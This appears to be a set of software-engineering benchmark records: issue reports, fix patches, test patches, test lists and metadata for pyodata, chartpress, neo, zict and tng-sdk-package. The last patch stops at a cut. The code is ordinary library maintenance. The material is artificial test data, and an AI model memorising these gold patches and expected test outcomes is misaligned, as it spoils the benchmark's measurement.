testdate = typ.traits.from_json("/Date(-62135596800000)/")
assert testdate.year == 1
assert testdate.month == 1
@@ -551,9 +562,19 @@ def test_traits_datetime():
assert testdate.microsecond == 0
assert testdate.tzinfo == current_timezone()
+ # parsing above highest value with workaround
+ pyodata.v2.model.FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE = True
+ testdate = typ.traits.from_json("/Date(253402300800000)/")
+ assert testdate.year == 9999
+ assert testdate.month == 12
+ assert testdate.day == 31
+ assert testdate.tzinfo == current_timezone()
+
# parsing the highest value
- with pytest.raises(OverflowError):
+ pyodata.v2.model.FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE = False
+ with pytest.raises(PyODataModelError) as e_info:
typ.traits.from_json("/Date(253402300800000)/")
+ assert str(e_info.value).startswith('Cannot decode datetime from value 253402300800000.')
testdate = typ.traits.from_json("/Date(253402300799999)/")
assert testdate.year == 9999
|
Date out of range error
According to #80 we are facing the same error. We're just a consumer using the API to receive data for our DWH. Currently one of our jobs fails because of this error.
Is it possible to implement a fix for this problem on the pyodata side?
Json:
```
{
"d": {
"results": {
"__metadata": {
"uri": "https://service.url/sap/c4c/odata/v1/c4codataapi/CorporateAccountIdentificationCollection('12345678910111213ABCDEFGHIJKLMNO')",
"type": "c4codata.CorporateAccountIdentification",
"etag": "W/"datetimeoffset'2021-02-01T19%3A41%3A17.9430080Z'""
},
"ObjectID": "12345678910111213ABCDEFGHIJKLMNO",
"ParentObjectID": "166345678910111213ABCDEFGHIJKLMNO",
"ETag": "/Date(1612208477943)/",
"AccountID": "12345",
"IDTypeCode": "ABCDE",
"IDTypeCodeText": "<ABCD12>",
"IDNumber": "1234-123",
"ResponsibleInstitution": "",
"EntryDate": null,
"ValidFrom": "/Date(-62135769600000)/",
"ValidTo": "/Date(253402214400000)/",
"CountryCode": "",
"CountryCodeText": "",
"StateCode": "",
"StateCodeText": "",
"ZZWECK_KUT": "",
"ZZWECK_KUTText": "",
"CorporateAccount": {
"__deferred": {
"uri": "https://service.url/sap/c4c/odata/v1/c4codataapi/CorporateAccountIdentificationCollection('12345678910111213ABCDEFGHIJKLMNO')/CorporateAccount"
}
}
}
}
}
```
Thanks & BR
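For context, a short sketch (using plain UTC instead of pyodata's `current_timezone()`) of why a payload like the `ValidFrom` above cannot be decoded, and of the module-level flags the patch adds as a workaround:
```
import datetime

epoch = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)

# -62135769600000 ms is two days before 0001-01-01 (datetime.min),
# so the addition pyodata performs raises OverflowError.
try:
    epoch + datetime.timedelta(milliseconds=-62135769600000)
except OverflowError as exc:
    print("cannot decode:", exc)

# With the flags added by the patch, out-of-range values are clamped to
# 0001-01-01 / 9999-12-31 instead of raising PyODataModelError.
import pyodata.v2.model
pyodata.v2.model.FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = True
pyodata.v2.model.FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE = True
```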
|
0.0
|
9a3694d553c64e781923e11f6fbc28af67b01bc3
|
[
"tests/test_model_v2.py::test_traits_datetime"
] |
[
"tests/test_model_v2.py::test_edmx",
"tests/test_model_v2.py::test_schema_entity_type_nullable",
"tests/test_model_v2.py::test_schema_entity_sets",
"tests/test_model_v2.py::test_edmx_associations",
"tests/test_model_v2.py::test_edmx_navigation_properties",
"tests/test_model_v2.py::test_edmx_function_imports",
"tests/test_model_v2.py::test_edmx_complex_types",
"tests/test_model_v2.py::test_edmx_complex_type_prop_vh",
"tests/test_model_v2.py::test_traits",
"tests/test_model_v2.py::test_traits_collections",
"tests/test_model_v2.py::test_type_parsing",
"tests/test_model_v2.py::test_types",
"tests/test_model_v2.py::test_complex_serializer",
"tests/test_model_v2.py::test_annot_v_l_missing_e_s",
"tests/test_model_v2.py::test_annot_v_l_missing_e_t",
"tests/test_model_v2.py::test_annot_v_l_trgt_inv_prop",
"tests/test_model_v2.py::test_namespace_with_periods",
"tests/test_model_v2.py::test_edmx_entity_sets",
"tests/test_model_v2.py::test_config_set_default_error_policy",
"tests/test_model_v2.py::test_null_type",
"tests/test_model_v2.py::test_faulty_association",
"tests/test_model_v2.py::test_faulty_association_set",
"tests/test_model_v2.py::test_missing_association_for_navigation_property",
"tests/test_model_v2.py::test_edmx_association_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_entity_set",
"tests/test_model_v2.py::test_missing_data_service",
"tests/test_model_v2.py::test_missing_schema",
"tests/test_model_v2.py::test_namespace_whitelist",
"tests/test_model_v2.py::test_unsupported_edmx_n",
"tests/test_model_v2.py::test_unsupported_schema_n",
"tests/test_model_v2.py::test_whitelisted_edm_namespace",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2006_04",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2007_05",
"tests/test_model_v2.py::test_enum_parsing",
"tests/test_model_v2.py::test_unsupported_enum_underlying_type",
"tests/test_model_v2.py::test_enum_value_out_of_range",
"tests/test_model_v2.py::test_missing_property_referenced_in_annotation",
"tests/test_model_v2.py::test_struct_type_has_property_initial_instance",
"tests/test_model_v2.py::test_struct_type_has_property_no",
"tests/test_model_v2.py::test_struct_type_has_property_yes"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_issue_reference"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-03-19 13:12:21+00:00
|
apache-2.0
| 665
|
|
jupyterhub__chartpress-63
|
diff --git a/.travis.yml b/.travis.yml
index a47cf03..998bf51 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -5,11 +5,12 @@ cache: pip
install:
- set -e
- pip install --upgrade pip
- - pip install pyflakes .
+ - pip install pyflakes pytest .
script:
- chartpress --version
- chartpress --help
- pyflakes .
+ - pytest -v ./tests
# This is a workaround to an issue caused by the existence of a docker
# registrymirror in our CI environment. Without this fix that removes the
diff --git a/CHANGELOG.md b/CHANGELOG.md
index fdbd930..f6b591c 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,23 @@
## 0.4
+### 0.4.3
+
+- Support `valuesPath` pointing to a single `image:tag` string in
+ addition to a dict with separate `repository` and `tag` keys.
+- Support lists in `valuesPath` by using integer indices,
+ e.g. `section.list.1.image` for the yaml:
+
+ ```yaml
+ section:
+ list:
+ - first: item
+ image: "not set"
+ - second: item
+ image: "image:tag" # <--sets this here
+ ```
+
+
### 0.4.2
- --long flag to always output build information in image tags and chart version [#57](https://github.com/jupyterhub/chartpress/pull/57) ([@consideRatio](https://github.com/consideRatio))
diff --git a/README.md b/README.md
index 7dbf6a9..6caa976 100644
--- a/README.md
+++ b/README.md
@@ -157,3 +157,19 @@ in your `.travis.yml`:
git:
depth: false
```
+
+## Development
+
+Testing of this python package can be done using [`pyflakes`](https://github.com/PyCQA/pyflakes) and [`pytest`](https://github.com/pytest-dev/pytest). There is also some additional testing that is only run as part of TravisCI, as declared in [`.travis.yml`](.travis.yml).
+
+```
+# install chartpress locally
+pip install -e .
+
+# install dev dependencies
+pip install pyflakes pytest
+
+# run tests
+pyflakes .
+pytest -v
+```
diff --git a/chartpress.py b/chartpress.py
index df0fb19..f6847da 100755
--- a/chartpress.py
+++ b/chartpress.py
@@ -10,6 +10,7 @@ from collections.abc import MutableMapping
from functools import lru_cache, partial
import os
import pipes
+import re
import shutil
import subprocess
from tempfile import TemporaryDirectory
@@ -55,29 +56,42 @@ def git_remote(git_repo):
return 'git@github.com:{0}'.format(git_repo)
-def last_modified_commit(*paths, **kwargs):
- """Get the last commit to modify the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%h',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+def latest_tag_or_mod_commit(*paths, **kwargs):
+ """
+ Get the latest of a) the latest tagged commit, or b) the latest modification
+ commit to provided path.
+ """
+ latest_modification_commit = check_output(
+ [
+ 'git', 'log',
+ '--max-count=1',
+ '--pretty=format:%h',
+ '--',
+ *paths,
+ ],
+ **kwargs,
+ ).decode('utf-8').strip()
+ git_describe_head = check_output(
+ [
+ 'git', 'describe', '--tags', '--long'
+ ],
+ **kwargs,
+ ).decode('utf-8').strip().rsplit("-", maxsplit=2)
+ latest_tagged_commit = git_describe_head[2][1:]
-def last_modified_date(*paths, **kwargs):
- """Return the last modified date (as a string) for the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%cd',
- '--date=iso',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+ try:
+ check_call(
+ [
+ 'git', 'merge-base', '--is-ancestor', latest_tagged_commit, latest_modification_commit,
+ ],
+ **kwargs,
+ )
+ except subprocess.CalledProcessError:
+ # latest_tagged_commit was newer than latest_modification_commit
+ return latest_tagged_commit
+ else:
+ return latest_modification_commit
def render_build_args(image_options, ns):
@@ -179,7 +193,55 @@ def image_needs_building(image):
return image_needs_pushing(image)
-def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_build=False, long=False):
+def _get_identifier(tag, n_commits, commit, long):
+ """
+ Returns a chartpress formatted chart version or image tag (identifier) with
+ a build suffix.
+
+ This function should provide valid Helm chart versions, which means they
+ need to be valid SemVer 2 version strings. It also needs to return valid
+ image tags, which means they need to not contain `+` signs either.
+
+ Example:
+ tag="0.1.2", n_commits="5", commit="asdf1234", long=True,
+ should return "0.1.2-005.asdf1234".
+ """
+ n_commits = int(n_commits)
+
+ if n_commits > 0 or long:
+ if "-" in tag:
+ # append a pre-release tag, with a . separator
+ # 0.1.2-alpha.1 -> 0.1.2-alpha.1.n.sha
+ return f"{tag}.{n_commits:03d}.{commit}"
+ else:
+ # append a release tag, with a - separator
+ # 0.1.2 -> 0.1.2-n.sha
+ return f"{tag}-{n_commits:03d}.{commit}"
+ else:
+ return f"{tag}"
+
+
+def _strip_identifiers_build_suffix(identifier):
+ """
+ Return a stripped chart version or image tag (identifier) without its build
+ suffix (.005.asdf1234), leaving it to represent a Semver 2 release or
+ pre-release.
+
+ Example:
+ identifier: "0.1.2-005.asdf1234" returns: "0.1.2"
+ identifier: "0.1.2-alpha.1.005.asdf1234" returns: "0.1.2-alpha.1"
+ """
+ # split away official SemVer 2 build specifications if used
+ if "+" in identifier:
+ return identifier.split("+", maxsplit=1)[0]
+
+ # split away our custom build specification: something ending in either
+ # . or - followed by three or more digits, a dot, an commit sha of four
+ # or more alphanumeric characters.
+ return re.sub(r'[-\.]\d{3,}\.\w{4,}\Z', "", identifier)
+
+
+def build_images(prefix, images, tag=None, push=False, chart_version=None, skip_build=False, long=False):
"""Build a collection of docker images
Args:
@@ -191,9 +253,9 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
to modify the image's files.
push (bool):
Whether to push the resulting images (default: False).
- chart_tag (str):
- The latest chart tag, included as a prefix on image tags
- if `tag` is not specified.
+ chart_version (str):
+ The latest chart version, trimmed from its build suffix, will be included
+ as a prefix on image tags if `tag` is not specified.
skip_build (bool):
Whether to skip the actual image build (only updates tags).
long (bool):
@@ -204,38 +266,35 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
Example 1:
- long=False: 0.9.0
- - long=True: 0.9.0_000.asdf1234
+ - long=True: 0.9.0-000.asdf1234
Example 2:
- - long=False: 0.9.0_004.sdfg2345
- - long=True: 0.9.0_004.sdfg2345
+ - long=False: 0.9.0-004.sdfg2345
+ - long=True: 0.9.0-004.sdfg2345
"""
value_modifications = {}
for name, options in images.items():
image_path = options.get('contextPath', os.path.join('images', name))
image_tag = tag
+ chart_version = _strip_identifiers_build_suffix(chart_version)
# include chartpress.yaml itself as it can contain build args and
# similar that influence the image that would be built
paths = list(options.get('paths', [])) + [image_path, 'chartpress.yaml']
- last_image_commit = last_modified_commit(*paths)
- if tag is None:
- n_commits = int(check_output(
+ image_commit = latest_tag_or_mod_commit(*paths, echo=False)
+ if image_tag is None:
+ n_commits = check_output(
[
'git', 'rev-list', '--count',
- # Note that the 0.0.1 chart_tag may not exist as it was a
+ # Note that the 0.0.1 chart_version may not exist as it was a
# workaround to handle git histories with no tags in the
- # current branch. Also, if the chart_tag is a later git
- # reference than the last_image_commit, this command will
- # return 0.
- f'{chart_tag + ".." if chart_tag != "0.0.1" else ""}{last_image_commit}',
+ # current branch. Also, if the chart_version is a later git
+ # reference than the image_commit, this
+ # command will return 0.
+ f'{"" if chart_version == "0.0.1" else chart_version + ".."}{image_commit}',
],
echo=False,
- ).decode('utf-8').strip())
-
- if n_commits > 0 or long:
- image_tag = f"{chart_tag}_{int(n_commits):03d}-{last_image_commit}"
- else:
- image_tag = f"{chart_tag}"
+ ).decode('utf-8').strip()
+ image_tag = _get_identifier(chart_version, n_commits, image_commit, long)
image_name = prefix + name
image_spec = '{}:{}'.format(image_name, image_tag)
@@ -251,7 +310,7 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
build_args = render_build_args(
options,
{
- 'LAST_COMMIT': last_image_commit,
+ 'LAST_COMMIT': image_commit,
'TAG': image_tag,
},
)
@@ -277,27 +336,49 @@ def build_values(name, values_mods):
values = yaml.load(f)
for key, value in values_mods.items():
+ if not isinstance(value, dict) or set(value.keys()) != {'repository', 'tag'}:
+ raise ValueError(f"I only understand image updates with 'repository', 'tag', not: {value!r}")
parts = key.split('.')
- mod_obj = values
+ mod_obj = parent = values
for p in parts:
+ if p.isdigit():
+ # integers are indices in lists
+ p = int(p)
+ parent = mod_obj
mod_obj = mod_obj[p]
- print(f"Updating {values_file}: {key}: {value}")
+ last_part = p
if isinstance(mod_obj, MutableMapping):
keys = IMAGE_REPOSITORY_KEYS & mod_obj.keys()
if keys:
- for key in keys:
- mod_obj[key] = value['repository']
+ for repo_key in keys:
+ before = mod_obj.get(repo_key, None)
+ if before != value['repository']:
+ print(f"Updating {values_file}: {key}.{repo_key}: {value}")
+ mod_obj[repo_key] = value['repository']
else:
possible_keys = ' or '.join(IMAGE_REPOSITORY_KEYS)
raise KeyError(
f'Could not find {possible_keys} in {values_file}:{key}'
)
+ before = mod_obj.get('tag', None)
+ if before != value['tag']:
+ print(f"Updating {values_file}: {key}.tag: {value}")
mod_obj['tag'] = value['tag']
+ elif isinstance(mod_obj, str):
+ # scalar image string, not dict with separate repository, tag keys
+ image = "{repository}:{tag}".format(**value)
+ try:
+ before = parent[last_part]
+ except (KeyError, IndexError):
+ before = None
+ if before != image:
+ print(f"Updating {values_file}: {key}: {image}")
+ parent[last_part] = image
else:
raise TypeError(
- f'The key {key} in {values_file} must be a mapping.'
+ f'The key {key} in {values_file} must be a mapping or string, not {type(mod_obj)}.'
)
@@ -315,34 +396,43 @@ def build_chart(name, version=None, paths=None, long=False):
Example versions constructed:
- 0.9.0-alpha.1
- - 0.9.0-alpha.1+000.asdf1234 (--long)
- - 0.9.0-alpha.1+005.sdfg2345
- - 0.9.0-alpha.1+005.sdfg2345 (--long)
+ - 0.9.0-alpha.1.000.asdf1234 (--long)
+ - 0.9.0-alpha.1.005.sdfg2345
+ - 0.9.0-alpha.1.005.sdfg2345 (--long)
+ - 0.9.0
+ - 0.9.0-002.dfgh3456
"""
chart_file = os.path.join(name, 'Chart.yaml')
with open(chart_file) as f:
chart = yaml.load(f)
- last_chart_commit = last_modified_commit(*paths)
-
if version is None:
+ chart_commit = latest_tag_or_mod_commit(*paths, echo=False)
+
try:
- git_describe = check_output(['git', 'describe', '--tags', '--long', last_chart_commit]).decode('utf8').strip()
+ git_describe = check_output(
+ [
+ 'git', 'describe', '--tags', '--long', chart_commit
+ ],
+ echo=False,
+ ).decode('utf8').strip()
latest_tag_in_branch, n_commits, sha = git_describe.rsplit('-', maxsplit=2)
-
- n_commits = int(n_commits)
- if n_commits > 0 or long:
- version = f"{latest_tag_in_branch}+{n_commits:03d}.{sha}"
- else:
- version = f"{latest_tag_in_branch}"
+ # remove "g" prefix output by the git describe command
+ # ref: https://git-scm.com/docs/git-describe#_examples
+ sha = sha[1:]
+ version = _get_identifier(latest_tag_in_branch, n_commits, sha, long)
except subprocess.CalledProcessError:
# no tags on branch: fallback to the SemVer 2 compliant version
- # 0.0.1+<n_comits>.<last_chart_commit>
- n_commits = int(check_output(
- ['git', 'rev-list', '--count', last_chart_commit],
+ # 0.0.1-<n_commits>.<chart_commit>
+ latest_tag_in_branch = "0.0.1"
+ n_commits = check_output(
+ [
+ 'git', 'rev-list', '--count', chart_commit
+ ],
echo=False,
- ).decode('utf-8').strip())
- version = f"0.0.1+{n_commits:03d}.{last_chart_commit}"
+ ).decode('utf-8').strip()
+
+ version = _get_identifier(latest_tag_in_branch, n_commits, chart_commit, long)
chart['version'] = version
@@ -510,10 +600,7 @@ def main():
images=chart['images'],
tag=args.tag if not args.reset else chart.get('resetTag', 'set-by-chartpress'),
push=args.push,
- # chart_tag will act as a image tag prefix, we can get it from
- # the chart_version by stripping away the build part of the
- # SemVer 2 compliant chart_version.
- chart_tag=chart_version.split('+')[0],
+ chart_version=chart_version,
skip_build=args.skip_build or args.reset,
long=args.long,
)
|
jupyterhub/chartpress
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
diff --git a/tests/test_regexp.py b/tests/test_regexp.py
new file mode 100644
index 0000000..b597655
--- /dev/null
+++ b/tests/test_regexp.py
@@ -0,0 +1,14 @@
+from chartpress import _strip_identifiers_build_suffix
+from chartpress import _get_identifier
+
+def test__strip_identifiers_build_suffix():
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-005.asdf1234") == "0.1.2"
+ assert _strip_identifiers_build_suffix(identifier="0.1.2-alpha.1.005.asdf1234") == "0.1.2-alpha.1"
+
+def test__get_identifier():
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=True) == "0.1.2-000.asdf123"
+ assert _get_identifier(tag="0.1.2", n_commits="0", commit="asdf123", long=False) == "0.1.2"
+ assert _get_identifier(tag="0.1.2", n_commits="5", commit="asdf123", long=False) == "0.1.2-005.asdf123"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=True) == "0.1.2-alpha.1.000.asdf1234"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="0", commit="asdf1234", long=False) == "0.1.2-alpha.1"
+ assert _get_identifier(tag="0.1.2-alpha.1", n_commits="5", commit="asdf1234", long=False) == "0.1.2-alpha.1.005.asdf1234"
|
Support images defined as string
Add support for images defined as `<registry>/<repo>:<tag>`.
Possible solutions to keep compatibility with images defined as a mapping (see the sketch below):
1. check the image value in `values.yaml`;
2. if it is a mapping, use the current way of setting the dictionary;
3. else use a formatted string `"{registry}/{repo}:{tag}".format(...)`
Please let me know what you think and I will send a PR.
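A hypothetical helper (names made up, not chartpress code) sketching the branching proposed above:
```
def set_image(values, key, repository, tag):
    """Update an image entry that may be either a mapping or a plain string."""
    current = values[key]
    if isinstance(current, dict):
        # mapping style: keep the separate repository/tag keys
        current["repository"] = repository
        current["tag"] = tag
    else:
        # scalar style: replace the whole "<registry>/<repo>:<tag>" string
        values[key] = "{}:{}".format(repository, tag)

values = {"image": "quay.io/org/app:old"}
set_image(values, "image", "quay.io/org/app", "1.2.3")
print(values)  # {'image': 'quay.io/org/app:1.2.3'}
```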
|
0.0
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
[
"tests/test_regexp.py::test__strip_identifiers_build_suffix",
"tests/test_regexp.py::test__get_identifier"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-10-20 17:39:35+00:00
|
bsd-3-clause
| 3,364
|
|
NeuralEnsemble__python-neo-1297
|
diff --git a/neo/io/__init__.py b/neo/io/__init__.py
index 22b6df66..4aa31692 100644
--- a/neo/io/__init__.py
+++ b/neo/io/__init__.py
@@ -451,8 +451,23 @@ def list_candidate_ios(file_or_folder, ignore_patterns=['*.ini', 'README.txt', '
# if only file prefix was provided, e.g /mydatafolder/session1-
# to select all files sharing the `session1-` prefix
elif file_or_folder.parent.exists():
- filenames = file_or_folder.parent.glob(file_or_folder.name + '*')
-
+ filenames = list(file_or_folder.parent.glob(file_or_folder.name + '*'))
+ # if filenames empty and suffix is provided then non-existent file
+ # may be written in current dir. So run check for io
+ if len(filenames)==0 and file_or_folder.suffix:
+ suffix = file_or_folder.suffix[1:].lower()
+ if suffix not in io_by_extension:
+ raise ValueError(f'{suffix} is not a supported format of any IO.')
+ return io_by_extension[suffix]
+
+ # If non-existent file in non-existent dir is given check if this
+ # structure could be created with an io writing the file
+ elif file_or_folder.suffix:
+ suffix = file_or_folder.suffix[1:].lower()
+ if suffix not in io_by_extension:
+ raise ValueError(f'{suffix} is not a supported format of any IO.')
+ return io_by_extension[suffix]
+
else:
raise ValueError(f'{file_or_folder} does not contain data files of a supported format')
|
NeuralEnsemble/python-neo
|
f608309c5ce031ecd905349c140b07a3dafb057d
|
diff --git a/neo/test/iotest/test_get_io.py b/neo/test/iotest/test_get_io.py
new file mode 100644
index 00000000..b43499b0
--- /dev/null
+++ b/neo/test/iotest/test_get_io.py
@@ -0,0 +1,41 @@
+from pathlib import Path
+from tempfile import TemporaryDirectory
+from neo.io import get_io, list_candidate_ios, NixIO
+
+
+def test_list_candidate_ios_non_existant_file():
+ # use plexon io suffix for testing here
+ non_existant_file = Path('non_existant_folder/non_existant_file.plx')
+ non_existant_file.unlink(missing_ok=True)
+ ios = list_candidate_ios(non_existant_file)
+
+ assert ios
+
+ # cleanup
+ non_existant_file.unlink(missing_ok=True)
+
+
+def test_list_candidate_ios_filename_stub():
+ # create dummy folder with dummy files
+ with TemporaryDirectory(prefix='filename_stub_test_') as test_folder:
+ test_folder = Path(test_folder)
+ test_filename = (test_folder / 'dummy_file.nix')
+ test_filename.touch()
+ filename_stub = test_filename.with_suffix('')
+
+ # check that io is found even though file suffix was not provided
+ ios = list_candidate_ios(filename_stub)
+
+ assert NixIO in ios
+
+
+def test_get_io_non_existant_file_writable_io():
+ # use nixio for testing with writable io
+ non_existant_file = Path('non_existant_file.nix')
+ non_existant_file.unlink(missing_ok=True)
+ io = get_io(non_existant_file)
+
+ assert isinstance(io, NixIO)
+
+ # cleanup
+ non_existant_file.unlink(missing_ok=True)
|
neo.get_io fails on file yet to be written
**Describe the bug**
Calling neo.get_io no longer works with the name of a file yet to be written
which means it can no longer be used before an `io.write(...)` call.
**To Reproduce**
```
import neo
neo.get_io("tobewritten.pkl")
```
**Expected behaviour**
return an io
**Environment:**
- OS: I think all, but found on Linux
- Python version: found with 3.11
- Neo version: 0.12.0 (worked in neo 0.10)
- NumPy version: not relevant
**Additional context**
Our workaround is:
```
def get_neo_io(file_or_folder):
    try:
        return neo.get_io(file_or_folder)
    except ValueError as ex:
        # As neo.get_io only works with existing files
        _, suffix = os.path.splitext(file_or_folder)
        suffix = suffix[1:].lower()
        if suffix in neo.io_by_extension:
            writer_list = neo.io_by_extension[suffix]
            return writer_list[0](file_or_folder)
```
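For reference, the behaviour the new tests expect once the fix is in (the file below does not need to exist; the name comes from the added test):
```
from neo.io import get_io

# The IO is resolved purely from the ".nix" suffix even though the
# file has not been written yet.
io = get_io("non_existant_file.nix")
print(type(io).__name__)  # NixIO
```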
|
0.0
|
f608309c5ce031ecd905349c140b07a3dafb057d
|
[
"neo/test/iotest/test_get_io.py::test_list_candidate_ios_non_existant_file",
"neo/test/iotest/test_get_io.py::test_get_io_non_existant_file_writable_io"
] |
[
"neo/test/iotest/test_get_io.py::test_list_candidate_ios_filename_stub"
] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2023-06-19 16:48:00+00:00
|
bsd-3-clause
| 397
|
|
dask__zict-64
|
diff --git a/doc/source/changelog.rst b/doc/source/changelog.rst
index 0375754..e493d3f 100644
--- a/doc/source/changelog.rst
+++ b/doc/source/changelog.rst
@@ -4,6 +4,8 @@ Changelog
2.2.0 - Unreleased
------------------
- Added type annotations (:pr:`62`) `Guido Imperiale`_
+- If you call Func.update() and Func wraps around File, do not store all dump outputs in
+ memory (:pr:`64`) `Guido Imperiale`_
2.1.0 - 2022-02-25
diff --git a/zict/common.py b/zict/common.py
index 6ed9e94..3d94a2e 100644
--- a/zict/common.py
+++ b/zict/common.py
@@ -1,6 +1,7 @@
from __future__ import annotations
from collections.abc import Iterable, Mapping
+from itertools import chain
from typing import MutableMapping # TODO move to collections.abc (needs Python >=3.9)
from typing import Any, TypeVar, overload
@@ -39,12 +40,12 @@ class ZictBase(MutableMapping[KT, VT]):
if args:
other = args[0]
if isinstance(other, Mapping) or hasattr(other, "items"):
- items += other.items()
+ items = other.items()
else:
# Assuming (key, value) pairs
- items += other
+ items = other
if kwds:
- items += kwds.items()
+ items = chain(items, kwds.items())
self._do_update(items)
def _do_update(self, items: Iterable[tuple[KT, VT]]) -> None:
|
dask/zict
|
6850845b645aea71bac342db9cafc8ed9546db4d
|
diff --git a/zict/tests/test_func.py b/zict/tests/test_func.py
index d2fbd34..5345045 100644
--- a/zict/tests/test_func.py
+++ b/zict/tests/test_func.py
@@ -1,4 +1,10 @@
+import gc
+from collections.abc import MutableMapping
+
+import pytest
+
from zict import Func
+from zict.common import ZictBase
from . import utils_test
@@ -46,3 +52,40 @@ def test_mapping():
z = Func(rotl, rotr, d)
utils_test.check_mapping(z)
utils_test.check_closing(z)
+
+
+@pytest.mark.parametrize("wrapped_cls", [MutableMapping, ZictBase])
+def test_update_descopes_early(wrapped_cls):
+ """Test that Func.update() descopes the output of self.dump as soon as it can, if
+ the wrapped mapping allows, and doesn't store everything into a list.
+ """
+
+ class Dumped:
+ n = 0
+
+ def __init__(self):
+ gc.collect() # Only necessary on pypy
+ Dumped.n += 1
+ assert Dumped.n < 3
+
+ def __del__(self):
+ Dumped.n -= 1
+
+ class Dummy(wrapped_cls):
+ def __setitem__(self, key, value):
+ pass
+
+ def __getitem__(self, key, value):
+ raise KeyError(key)
+
+ def __delitem__(self, key):
+ raise KeyError(key)
+
+ def __iter__(self):
+ return iter(())
+
+ def __len__(self):
+ return 0
+
+ d = Func(lambda v: Dumped(), lambda w: None, Dummy())
+ d.update(dict.fromkeys(range(10)))
|
Memory flare on Func.update() with File backend
Consider:
```python
d = Func(pickle.dumps, pickle.loads, File(somedir))
d.update(mydata)
```
### Current behaviour
1. call ``pickle.dumps`` on every element of mydata and store all output in memory
2. call ``File.__setitem__`` on each pickled element
3. descope the pickled data all at once
### Expected behaviour
File does not have an optimized update method, unlike LMDB or Sieve, as it does not benefit from updating everything in a single call.
Therefore, it should be possible to create a pickle buffer for every value, write it to disk, and then release it straight away.
The issue is not in Func, but actually in File.update and, to be precise, in ZictBase.update, which converts iterables into lists.
### Mitigation
- Instead of ``pickle.dumps``, write a function that returns a tuple of (pickle5 output, *buffers).
- If you wrap Func in a zict.Buffer, Func.update will never be called.
dask.distributed does both of the above.
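A rough sketch (not the actual ZictBase code) of the streaming idea: keep the items lazy so each dumped value can be released as soon as the wrapped mapping has stored it, instead of holding all of them in a list.
```
from itertools import chain

def update_streaming(target, other=(), **kwds):
    # Keep a lazy iterable instead of materializing a list, so a
    # Func-over-File backend can write and then drop each pickled
    # value one at a time.
    items = other.items() if hasattr(other, "items") else other
    if kwds:
        items = chain(items, kwds.items())
    for key, value in items:
        target[key] = value
```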
|
0.0
|
6850845b645aea71bac342db9cafc8ed9546db4d
|
[
"zict/tests/test_func.py::test_update_descopes_early[ZictBase]"
] |
[
"zict/tests/test_func.py::test_simple",
"zict/tests/test_func.py::test_mapping",
"zict/tests/test_func.py::test_update_descopes_early[MutableMapping]"
] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-03-07 14:38:44+00:00
|
bsd-3-clause
| 1,807
|
|
sonata-nfv__tng-sdk-package-16
|
diff --git a/src/tngsdk/package/__init__.py b/src/tngsdk/package/__init__.py
index 82cd398..c3e1fb3 100755
--- a/src/tngsdk/package/__init__.py
+++ b/src/tngsdk/package/__init__.py
@@ -30,6 +30,36 @@
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.5gtango.eu).
+import logging
+import coloredlogs
+import os
+
+from tngsdk.package.cli import parse_args, CLI
+from tngsdk.package.pkgmgm import Packager
+
+
+LOG = logging.getLogger(os.path.basename(__file__))
+
+
+def logging_setup():
+ os.environ["COLOREDLOGS_LOG_FORMAT"] \
+ = "%(asctime)s [%(levelname)s] [%(name)s] %(message)s"
+
def main():
- print("not implemented")
+ logging_setup()
+ args = parse_args()
+ # TODO better log configuration (e.g. file-based logging)
+ if args.verbose:
+ coloredlogs.install(level="DEBUG")
+ else:
+ coloredlogs.install(level="INFO")
+ # TODO validate if args combination makes any sense
+ p = Packager(args)
+ if args.service:
+ # TODO start package in service mode
+ pass
+ else:
+ # run package in CLI mode
+ c = CLI(args, p)
+ c.dispatch()
diff --git a/src/tngsdk/package/cli.py b/src/tngsdk/package/cli.py
new file mode 100644
index 0000000..88928c0
--- /dev/null
+++ b/src/tngsdk/package/cli.py
@@ -0,0 +1,119 @@
+# Copyright (c) 2015 SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# ALL RIGHTS RESERVED.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Neither the name of the SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# nor the names of its contributors may be used to endorse or promote
+# products derived from this software without specific prior written
+# permission.
+#
+# This work has been performed in the framework of the SONATA project,
